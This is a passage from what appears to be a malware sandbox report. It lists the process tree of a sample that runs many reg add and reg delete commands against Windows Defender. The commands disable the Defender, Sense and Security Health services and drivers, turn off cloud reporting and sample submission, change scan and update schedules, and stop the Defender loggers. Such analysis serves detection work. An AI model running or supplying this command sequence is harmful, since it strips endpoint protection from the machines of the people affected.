- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:8376
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    PID:6156
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
  2⤵
  PID:7336
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f
    3⤵
    PID:5560
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f"
  2⤵
  PID:5816
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /t REG_DWORD /d 8 /f
    3⤵
    PID:7628
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f"
  2⤵
  PID:8120
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:8536
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f"
  2⤵
  PID:4940
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /t REG_DWORD /d 0 /f
    3⤵
    PID:4012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
  2⤵
  PID:7656
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
    3⤵
    PID:8748
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f"
  2⤵
  PID:6492
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v LocalSettingOverrideSpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:1088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7224
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f"
  2⤵
  PID:7392
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReportingLocation /t REG_MULTI_SZ /d 0 /f
    3⤵
    PID:8600
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
  2⤵
  PID:6588
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
    3⤵
    PID:7816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8852
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\Sense /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies registry key
    PID:5140
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:8460
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies security service
    PID:7552
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
  2⤵
  PID:8836
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\MsSecFlt /v Start /t REG_DWORD /d 4 /f"
    3⤵
    - Modifies registry key
    PID:5908
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:7304
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:7228
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:9172
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:5368
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:6520
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:6932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8056
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:7632
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
  2⤵
  PID:7452
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
    3⤵
    - Modifies Security services
    PID:8172
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:6852
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
  2⤵
  PID:4036
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
    3⤵
    - Modifies registry key
    PID:1084
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  PID:8068
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /t REG_BINARY /d 03,00,00,00,00,00,00,00,00,00,00,00 /f
    3⤵
    PID:6604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
  2⤵
  PID:8256
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SecurityHealt /f
    3⤵
    PID:5524
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f"
  2⤵
  PID:8200
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Security Health\State" /v AccountProtection_MicrosoftAccount_Disconnected /f
    3⤵
    PID:5964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2900
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /f
    3⤵
    PID:8916
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f"
  2⤵
  PID:2828
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:8088
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    PID:5180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:680
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiVirus /f
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f"
  2⤵
  PID:6912
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9060
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v FirstAuGracePeriod /f
    3⤵
    PID:7176
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f"
  2⤵
  PID:5836
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v DisablePrivacyMode /f
    3⤵
    PID:7684
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
  2⤵
  PID:5248
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /f
    3⤵
    PID:6064
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
  2⤵
  PID:8316
- - C:\Windows\SysWOW64\reg.exe
    reg delete HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontReportInfectionInformation /f
    3⤵
    - Modifies registry key
    PID:7180
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f"
  2⤵
  PID:6324
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f"
  2⤵
  PID:4376
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f"
  2⤵
  PID:5168
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /f
    3⤵
    PID:4504
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f"
  2⤵
  PID:7812
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v RandomizeScheduleTaskTimes /f
    3⤵
    PID:6416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f"
  2⤵
  PID:4592
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v DisableAutoExclusions /f
    3⤵
    PID:5852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f"
  2⤵
  PID:7788
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8292
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /f
    3⤵
    PID:6052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f"
  2⤵
  PID:7640
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:896
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v LocalSettingOverridePurgeItemsAfterDelay /f
    3⤵
    PID:4452
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:5828
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v PurgeItemsAfterDelay /f
    3⤵
    PID:8548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f"
  2⤵
  PID:6848
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5744
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /f
    3⤵
    PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f"
  2⤵
  PID:5372
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /f
    3⤵
    PID:9076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f"
  2⤵
  PID:6632
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /f
    3⤵
    PID:996
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f"
  2⤵
  PID:1136
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
    3⤵
    PID:9192
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f"
  2⤵
  PID:6668
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /f
    3⤵
    PID:8816
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f"
  2⤵
  PID:5140
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /f
    3⤵
    PID:1728
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f"
  2⤵
  PID:6204
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /f
    3⤵
    PID:2592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f"
  2⤵
  PID:1032
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8472
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleDay /f
    3⤵
    PID:1612
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f"
  2⤵
  PID:7840
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v Scan_ScheduleTime /f
    3⤵
    PID:7348
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f"
  2⤵
  PID:6908
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v AdditionalActionTimeOut /f
    3⤵
    PID:5176
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f"
  2⤵
  PID:3224
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v CriticalFailureTimeOut /f
    3⤵
    PID:7992
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f"
  2⤵
  PID:3860
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /f
    3⤵
    PID:3868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f"
  2⤵
  PID:5116
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:9076
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v DisableGenericRePorts /f
    3⤵
    PID:5736
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f"
  2⤵
  PID:7292
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v NonCriticalTimeOut /f
    3⤵
    PID:2408
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f"
  2⤵
  PID:5984
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8372
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v AvgCPULoadFactor /f
    3⤵
    PID:1136
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f"
  2⤵
  PID:8380
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableArchiveScanning /f
    3⤵
    PID:6468
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f"
  2⤵
  PID:8468
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupFullScan /f
    3⤵
    PID:7520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f"
  2⤵
  PID:5360
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableCatchupQuickScan /f
    3⤵
    PID:3412
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f"
  2⤵
  PID:8340
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:7512
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f"
  2⤵
  PID:6056
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /f
    3⤵
    PID:8152
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f"
  2⤵
  PID:5952
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningMappedNetworkDrivesForFullScan /f
    3⤵
    PID:8652
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f"
  2⤵
  PID:8404
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScanningNetworkFiles /f
    3⤵
    PID:5340
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f"
  2⤵
  PID:7248
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8824
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v PurgeItemsAfterDelay /f
    3⤵
    PID:8556
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f"
  2⤵
  PID:6280
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanOnlyIfIdle /f
    3⤵
    PID:796
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f"
  2⤵
  PID:7984
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScanParameters /f
    3⤵
    PID:7272
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f"
  2⤵
  PID:5392
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleDay /f
    3⤵
    PID:8436
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f"
  2⤵
  PID:8124
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v ScheduleTime /f
    3⤵
    PID:5792
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f"
  2⤵
  PID:8712
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f"
  2⤵
  PID:3368
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleDay /f
    3⤵
    PID:4012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:8560
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ScheduleTime /f
    3⤵
    PID:8404
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f"
  2⤵
  PID:8940
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v SignatureUpdateCatchupInterval /f
    3⤵
    PID:5760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f"
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /f
    3⤵
    PID:5044
- C:\Windows\SysWOW64\cmd.exe
